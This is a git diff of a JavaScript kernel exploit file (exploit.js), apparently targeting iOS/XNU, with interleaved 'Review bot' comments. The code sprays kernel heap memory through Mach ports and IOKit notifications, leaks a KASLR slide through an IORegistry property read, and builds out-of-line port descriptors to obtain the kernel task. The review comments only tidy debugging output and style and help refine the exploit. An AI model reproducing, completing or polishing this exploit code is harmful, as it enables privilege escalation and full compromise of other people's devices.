Diffstat (limited to 'src/js/kexp')
-rwxr-xr-xsrc/js/kexp/exploit.js79
1 files changed, 39 insertions, 40 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 22f68ca..544a876 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -85,10 +85,11 @@ function spray_data(mem, size, num, portptr) {
printf("%x %x\n", master, read_u32(master));
printf("%x\n", read_u32(0x36ebf00c + get_dyld_shc_slide()));
ret = io_service_add_notification_ool(read_u32(master), "IOServiceTerminate", dict, __cnt * 4, MACH_PORT_NULL, NULL, 0, err, portptr);
- printf("still alive?\n");
+ printf("still alive? %x %x\n", err, read_u32(err));
if (ret == KERN_SUCCESS) {
ret = read_u32(err);
}
+ printf("still alive? %x %x\n", err, read_u32(err));
return ret;
}
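Review bot: The added `printf("still alive? %x %x\n", err, read_u32(err));` is emitted twice, once before and once after the `if (ret == KERN_SUCCESS)` block, and the first call reads `err` before the result of io_service_add_notification_ool has been checked, so on failure it presumably prints whatever the buffer already held. The same unconditional tracing is added in the copyinPort hunks (the second `sprayed, still here`, the `%d %s` result line, `still still alive?` and `didn't find it`) and in spray_ports, where the commented-out `spray_ports %d` trace is re-enabled. If these are meant to stay, gate them behind one module-level flag (e.g. a `var DEBUG = false;` added near the top of the file) and drop the duplicates; otherwise remove them before merging. spray_data's body begins outside the hunk.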
@@ -106,6 +107,7 @@ function copyinPort(kport, cnt) {
fakeportData = malloc(4);
host_get_io_master(mach_host_self(), master);
ret = spray_data(NULL, 0, 5, data);
+ printf("sprayed, still here\n");
printf("spray_data=%d (%s)\n", ret, mach_error_string(ret));
printf("sprayed, still here\n");
@@ -129,17 +131,21 @@ function copyinPort(kport, cnt) {
IORegistryEntryGetChildIterator(service, "IOService", it);
var found = false;
+ var o = IOIteratorNext(read_u32(it));
+ printf("%x\n", o);
- while ((o = IOIteratorNext(read_u32(it))) != MACH_PORT_NULL && !found) {
+ while (o != MACH_PORT_NULL && !found) {
var buf = malloc(16 * 4);
var size = malloc(4);
write_u32(size, 16 * 4);
ret = IORegistryEntryGetProperty(o, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", buf, size);
+ printf("%d %s\n", ret, mach_error_string(ret));
if (ret == KERN_SUCCESS) {
printf("yolo\n");
// mach_port_deallocate(self, read_u32(data));
// write_u32(data, MACH_PORT_NULL);
spray_data(tst, strlen(tst) + 1, 10, fakeportData);
+ printf("still still alive?\n");
kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0;
printf("still alive? %x\n", 420);
printf("YOLO YOLO YOLO kaslr_slide=%s\n", kslide.toString(16));
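Review bot: The kslide computation two lines above the `YOLO` print masks `read_u32(buf + (9 << 2))` with `0xFFF00000` and adjusts by `0x1000` and `0x80001000` without a comment, and the key passed to IORegistryEntryGetProperty is a long run of `A`s whose length appears to be the only property that matters; neither is explained. Add a one-line comment above each stating what word index 9 and the two constants refer to, and build the key from a named length, e.g. `var keyLen = /* documented length */; var key = new Array(keyLen + 1).join('A');`, so the intended size is visible rather than counted. copyinPort continues outside the hunk.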
@@ -147,6 +153,7 @@ function copyinPort(kport, cnt) {
return ((read_u32(buf + (4 << 2)) - 0x78)) >>> 0;
}
}
+ printf("didn't find it\n");
}
function prepare_ptr(dict, size, ptr, num) {
@@ -183,7 +190,7 @@ function spray(dict, size, port) {
var kp = 0;
function spray_ports(number_port_descs) {
-// printf("spray_ports %d\n", number_port_descs);
+ printf("spray_ports %d\n", number_port_descs);
if (kp == 0) {
kp = malloc(4);
mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
@@ -211,10 +218,11 @@ function fast_log2(n) {
}
function fast_array_mul(arr, n) {
+ var up_to = fast_log2(n) + 1;
var tmp_arr = arr;
var done = 0;
- for (var i = 0; i < fast_log2(n) + 2; i++) {
- tmp_arr = tmp_arr.concat(tmp_arr);
+ for (var i = 0; i < up_to; i++) {
+ tmp_arr.push.apply(tmp_arr);
done = (1 << i);
}
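Review bot: `tmp_arr.push.apply(tmp_arr);` passes no argument array, so push receives zero items and the loop body no longer grows `tmp_arr` at all; `done` still advances, so the function returns something that is not the repeated array its name promises. The only caller, in send_ports, is commented out in this same commit, which makes fast_array_mul dead code; delete it (and fast_log2, if nothing else in the file uses it) rather than keep a no-op. If it is kept, note that `var tmp_arr = arr` now aliases the caller's array where the removed `concat` produced a copy. fast_array_mul's body continues outside the hunk.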
@@ -232,27 +240,33 @@ function send_ports(target, payload, num, number_port_descs) {
write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs);
- var new_buf_ = new Array();
- var tmp = u32_to_u8x4(init_port_set);
- new_buf_.push(tmp[0]);
- new_buf_.push(tmp[1]);
- new_buf_.push(tmp[2]);
- new_buf_.push(tmp[3]);
- tmp = u32_to_u8x4(num);
- new_buf_.push(tmp[0]);
- new_buf_.push(tmp[1]);
- new_buf_.push(tmp[2]);
- new_buf_.push(tmp[3]);
- new_buf_.push(0);
- new_buf_.push(0);
- new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR);
- new_buf_.push(19);
+ var new_buf = new Uint32Array(3);
+// var tmp = u32_to_u8x4(init_port_set);
+ new_buf[0] = (init_port_set);
+ new_buf[1] = (num);
+ new_buf[2] = ((19 << 24) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 16));
+
+// new_buf_.push(tmp[0]);
+// new_buf_.push(tmp[1]);
+// new_buf_.push(tmp[2]);
+// new_buf_.push(tmp[3]);
+// tmp = u32_to_u8x4(num);
+// new_buf_.push(tmp[0]);
+// new_buf_.push(tmp[1]);
+// new_buf_.push(tmp[2]);
+// new_buf_.push(tmp[3]);
+// new_buf_.push(0);
+// new_buf_.push(0);
+// new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR);
+// new_buf_.push(19);
// printf("%x 0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,\n", new_buf_.length, new_buf_[zz]]);
- var new_buf = fast_array_mul(new_buf_, number_port_descs);
+// var new_buf = fast_array_mul(new_buf_, number_port_descs);
- fast_write_buf(buf + req_init_port_set, new_buf);
+ for (var i = 0; i < number_port_descs; i++) {
+ write_u32_buf(buf + req_init_port_set + (i * 0xc), new_buf, new_buf.length * 4);
+ }
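Review bot: The thirteen `// new_buf_.push(...)` lines together with `// var tmp = u32_to_u8x4(init_port_set);` and `// var new_buf = fast_array_mul(new_buf_, number_port_descs);` are commented-out code, not commentary; delete them, the history keeps the byte-wise version. What a reader does need is a one-line comment above `new_buf[2] = ((19 << 24) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 16));` saying which two fields are packed into that word and in what byte order, since that single line replaces four separate pushes. The write loop's stride `i * 0xc` and the length `new_buf.length * 4` also deserve a short note tying them to the size of one descriptor. send_ports continues outside the hunk.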
/*
for (var i = 0; i < number_port_descs; i++) {
@@ -286,7 +300,7 @@ function release_port_ptrs(port) {
var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
printf("alive\n");
// if (ret != KERN_SUCCESS) {
- printf("mach_recv %d %s\n", ret, mach_error_string(ret));
+// printf("mach_recv %d %s\n", ret, mach_error_string(ret));
printf("alive\n");
// }
free(req);
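Review bot: With `printf("mach_recv %d %s\n", ret, mach_error_string(ret));` commented out and the surrounding `if (ret != KERN_SUCCESS)` already commented, the return value of mach_msg on the first line is assigned to `ret` and never inspected, so a failed or timed-out receive is indistinguishable from success and the two `alive` prints are all that remain. Keep at least the error branch: `if (ret != KERN_SUCCESS) printf("mach_recv %d %s\n", ret, mach_error_string(ret));`. release_port_ptrs starts outside the hunk.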
@@ -339,34 +353,19 @@ function get_kernel_task() {
prepare_ptr(big_buf, big_size, kptr, 256);
prepare_ptr(small_buf, small_size, kptr, 32);
- sched_yield();
+ var dummy = malloc(4);
for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
- var dummy = malloc(4);
spray(big_buf, big_size, dummy);
}
- sched_yield();
+ var dummy = malloc(4);
for (var i = 0; i < PORTS_NUM; i++) {
write_u32(fp + (i << 2), spray_ports(i));
- var dummy = malloc(4);
spray(small_buf, small_size, dummy);
}
- sched_yield();
for (var i = 0; i < PORTS_NUM; i++) {
- printf("test\n");
- printf("test1\n");
- printf("test2\n");
- printf("test3\n");
- printf("test4\n");
- printf("test5\n");
- printf("test6\n");
- printf("test7\n");
- printf("test8\n");
- printf("test9\n");
- printf("test10\n");
release_port_ptrs(read_u32(fp + (i << 2)));
- printf("test11\n");
}
printf("get lucky\n");
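Review bot: `var dummy = malloc(4);` is declared twice at function level in get_kernel_task, before the PORTS_NUM_PRESPRAY loop and again before the PORTS_NUM loop; with var hoisting the second is only a reassignment of the same binding, but it reads as if two separate scopes were intended. Drop the `var` on the second occurrence so it reads as the reassignment it is, and since the three `sched_yield()` calls were removed in the same hunk, a short comment on why the yields are no longer needed would help the next reader. get_kernel_task continues past the hunk.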